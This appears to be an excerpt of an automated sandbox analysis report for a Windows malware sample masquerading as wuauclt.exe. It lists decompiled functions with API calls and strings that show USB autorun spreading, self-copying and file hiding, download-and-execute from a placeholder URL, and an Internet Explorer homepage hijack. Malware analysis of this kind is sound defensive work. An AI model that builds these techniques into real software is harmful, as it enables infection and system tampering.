                                                                            • String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
                                                                            • API String ID: 1888836333-1695214238
                                                                            • Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
                                                                            • Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D
                                                                            Function 00406354 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
                                                                            • Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D
                                                                            Function 00405FB0 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
                                                                            • Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D
                                                                            Function 0040554C Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile$CacheDownloadEntryFindSleepWindow
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w$t
                                                                            • API String ID: 2925464748-437854802
                                                                            • Opcode ID: e754100c373f77bf29b1a46c404491ba3345532de7349a65211476ef8906ed82
                                                                            • Instruction ID: fce2701fde403f0fd4f63779a484b59778674d3ae0df84e1f7a0fac326dad310
                                                                            • Opcode Fuzzy Hash: e754100c373f77bf29b1a46c404491ba3345532de7349a65211476ef8906ed82
                                                                            • Instruction Fuzzy Hash: F9811D70611205ABDB00FBA5D986A8E7BB9EF45708F10447BF540BB2E3CA78AD058B5D
                                                                            Function 004055D8 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 192filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
                                                                            • API String ID: 4037061717-2671944630
                                                                            • Opcode ID: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
                                                                            • Opcode Fuzzy Hash: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D
                                                                            Function 00408BD4 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 133filewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
                                                                            • PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
                                                                            • SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
                                                                            • DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
                                                                            • String ID: bbyb$open$wuauclt.exe
                                                                            • API String ID: 2051752798-429206649
                                                                            • Opcode ID: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
                                                                            • Opcode Fuzzy Hash: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D
                                                                            Function 004081E8 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 128filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
                                                                            • String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
                                                                            • API String ID: 1217617683-1617324073
                                                                            • Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
                                                                            • Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D
                                                                            Function 00405D7C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 127filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
                                                                            • String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
                                                                            • API String ID: 2803323816-32510556
                                                                            • Opcode ID: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
                                                                            • Opcode Fuzzy Hash: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D
                                                                            Function 00407BEC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 94sleepfilenetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
                                                                            • String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
                                                                            • API String ID: 1899506612-3830082169
                                                                            • Opcode ID: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
                                                                            • Opcode Fuzzy Hash: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E
                                                                            Function 00408A20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1238 408a20-408a82 LoadIconA LoadCursorA RegisterClassA 1239 408b10-408b12 1238->1239 1240 408a88-408aba call 404414 1238->1240 1240->1239 1243 408abc-408add SetTimer 1240->1243 1244 408aeb-408af9 GetMessageA 1243->1244 1245 408afb-408b0b KillTimer 1244->1245 1246 408adf-408ae6 TranslateMessage DispatchMessageA 1244->1246 1245->1239 1246->1244
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F72,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction ID: 3bba51ca83177c78f7b5e7647297d040befd782e8eab32064d4fce7d17e62b12
                                                                            • Opcode Fuzzy Hash: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction Fuzzy Hash: 82213EB0780701AFD720EF659D42F1736E8AB44704F10593EBA45FB6D2DBB8A8118B5C
                                                                            Function 0040288C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
